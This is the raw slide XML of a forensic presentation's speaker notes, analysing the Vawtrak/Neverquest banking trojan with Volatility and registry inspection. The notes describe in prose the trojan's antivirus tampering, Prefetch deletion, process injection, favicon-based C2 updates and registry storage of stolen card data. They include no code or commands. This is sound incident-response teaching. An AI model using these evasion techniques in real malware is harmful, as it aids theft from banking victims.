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73" r:id="rId2"/>
    <p:sldMasterId id="2147483680" r:id="rId3"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId46"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="294" r:id="rId4"/>
    <p:sldId id="293" r:id="rId5"/>
    <p:sldId id="295" r:id="rId6"/>
    <p:sldId id="296" r:id="rId7"/>
    <p:sldId id="328" r:id="rId8"/>
    <p:sldId id="299" r:id="rId9"/>
    <p:sldId id="297" r:id="rId10"/>
    <p:sldId id="298" r:id="rId11"/>
    <p:sldId id="327" r:id="rId12"/>
    <p:sldId id="300" r:id="rId13"/>
    <p:sldId id="301" r:id="rId14"/>
    <p:sldId id="302" r:id="rId15"/>
    <p:sldId id="303" r:id="rId16"/>
    <p:sldId id="304" r:id="rId17"/>
    <p:sldId id="305" r:id="rId18"/>
    <p:sldId id="306" r:id="rId19"/>
    <p:sldId id="307" r:id="rId20"/>
    <p:sldId id="318" r:id="rId21"/>
    <p:sldId id="329" r:id="rId22"/>
    <p:sldId id="330" r:id="rId23"/>
    <p:sldId id="331" r:id="rId24"/>
    <p:sldId id="311" r:id="rId25"/>
    <p:sldId id="332" r:id="rId26"/>
    <p:sldId id="313" r:id="rId27"/>
    <p:sldId id="314" r:id="rId28"/>
    <p:sldId id="315" r:id="rId29"/>
    <p:sldId id="316" r:id="rId30"/>
    <p:sldId id="312" r:id="rId31"/>
    <p:sldId id="333" r:id="rId32"/>
    <p:sldId id="308" r:id="rId33"/>
    <p:sldId id="309" r:id="rId34"/>
    <p:sldId id="310" r:id="rId35"/>
    <p:sldId id="334" r:id="rId36"/>
    <p:sldId id="335" r:id="rId37"/>
    <p:sldId id="319" r:id="rId38"/>
    <p:sldId id="320" r:id="rId39"/>
    <p:sldId id="317" r:id="rId40"/>
    <p:sldId id="321" r:id="rId41"/>
    <p:sldId id="322" r:id="rId42"/>
    <p:sldId id="323" r:id="rId43"/>
    <p:sldId id="324" r:id="rId44"/>
    <p:sldId id="32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80" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="128" d="100"/>
          <a:sy n="128" d="100"/>
        </p:scale>
        <p:origin x="-35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FF502-56CA-4646-9BC4-EC98105712A8}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/13/2016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EDABC0-2FCF-4406-9507-F4D10155A61B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235957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Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
              <a:t> evolved out of the earlier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Gozi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
              <a:t> malware family. Applying key components from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Ursniff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
              <a:t> malware family the authors introduced </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Gozi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Prinimalka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
              <a:t> in 2013 which evolved into the first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Vawtrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Trojan.</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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4192774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Extracted from memory from the Internet Explorer running process.</a:t>
            </a:r>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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428695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Vawtrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> will set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>SaferFlags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> value to ‘0’ and enter the name of the Antivirus product in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ItemData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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="243148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Vawtrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> will search for any of these Antivirus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> applications and then attempt to modify their registry settings to enforce Software Restriction policies. </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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="813114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Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> modifies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the registry settings of the most popular anti-virus products to enforce Software Restriction Policies. Because of this restriction, many antivirus products that may detect the malware are unable to delete or quarantine it.</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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36919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appears to be no unusual processes that ran on the system when looking at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Prefetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> will delete the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Prefetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> file that is associated with the startup of the Trojan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Nothing in Internet History</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> will dump the browser cache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Nothing in the Firewall Logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> will deprecate some firewall applications, or use a SOCKS proxy to work around them.</a:t>
            </a:r>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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2673415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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4041360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a place to start. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Autoruns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> shows an unusual startup process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This is being executed by a native</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Windows process, Regsvr32.exe.  This is why there are no unusual running processes. And, since it is being executed by Regsvr32.exe it is likely a DLL that is being injected into another process.</a:t>
            </a:r>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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="560128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the injection into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>explorer.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> process. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Vawtrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> constantly polls the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>autostart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> registry path to insure persistence on the system. This data was extracted from memory using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Volitility’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Volshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>In some versions of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>NeverQuest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Dat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> file is RC4 encrypted. The file becomes unencrypted in memory when the process runs. Recovering from memory saves a lot of time as opposed to trying to identify the cipher key.  Remember: “Malware can hide but it must run!”</a:t>
            </a:r>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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3880529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a second injected process, iexplore.exe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This output was generated using the Volatility ‘handles’ plugin.  On this system, three instances of Internet Explorer were running simultaneously.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9EEDABC0-2FCF-4406-9507-F4D10155A61B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2286594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Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Framework Injector running in memory. The decoded configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> file starts with the string ‘ECFG’ (not shown).</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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146750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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> use a single password across multiple platforms. If the attacker is able to compromise a password from one platform, they may be able to use it on another more secure platform.</a:t>
            </a:r>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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3643797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Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> C2 domains are also encoded within the configuration file. The list of URLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> can be found in the decoded file after the starting string ‘CPIT’. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The list of C2s can be constantly updated using a form of steganography. The Trojan will reach out and request a modified favicon file with new domains embedded inside.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>These domains are used to download additional modules.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Some recent versions of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> are now using tor2web domains and connecting over SSL to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> data.</a:t>
            </a:r>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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2997635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NeverQuest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> will only send traffic when</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the victim opens a browser to blend in with legitimate network traffic. This is why no outbound connections were seen in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Netscan</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NeverQuest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is also equipped with a different set of hooks for a variety of browsers from IE, Firefox, Chrome, etc. The bottom POST is the initial outbound connection to notify the command and control of a successful compromise. The header data above is from the acknowledgement.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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1148842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Outbound connections to the Command and Control (C2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> server.  There are no outbound connections for these IP addresses found in Internet History or firewall logs.</a:t>
            </a:r>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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3638289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in Handles is a pointer to a suspicious CLSID. Lets take a look at the Registry.</a:t>
            </a:r>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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1994161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configuration file is found in the registry. Most of the time this file is RC4 encrypted, however in some instances it appears in plain text. What else can we find in the Registry by looking for pointers in memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and simply looking for activity around the time this key is created.</a:t>
            </a:r>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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="570677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Continuously polls the path to the .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>dat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> file. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Vawtrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> uses a persistence methodology called ‘recurring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>runkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>’. In the event that it is deleted a new .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>dat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> file is automatically generated from a configuration file hidden in the registry.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This file was dropped from the Fiesta Exploit Kit. The victim was redirected to the site via a malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> on an otherwise legitimate site.</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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3866580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Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> stores network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and proxy information, banking data and its own configuration file in the registry.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The configuration file is encoded using a Linear </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Congruential</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Generator (LCG) and placed in the registry under a unique CLSID value. It is possible to find the CLSID in memory under the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>iexplore.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> process. Need to have the memory capture!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>In many variants of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the key names are also encrypted.</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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184800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of Credit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Card information stored in the registry includes Card Number, account balance, available credit, address of the account holder, and four digit PIN.</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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1919117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Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> runs in memory waiting for certain keywords to be typed into the browser to identify potential banking activity.  You can identify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Vawtrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> or other banking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> activity by using this methodology against them. Terms such as ‘Online Banking’ or ‘Account Balance’ or ‘Personal Checking’  can potentially identify banking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> activity in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Pagefile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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="830704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initial inspection of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Prefetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> folder found no unusual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> running processes. Nor was there a listing for the Windows process Regsvr32.exe.  However, multiple deleted trace files for Regsvr32.exe were found in Unallocated Space. These were deleted from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Prefetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. The trace file gives us information on the last run time of the process and how many times it ran.  These times match up perfectly with the closed processes listed in Volatility </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>pslist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> from the memory dump.</a:t>
            </a:r>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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
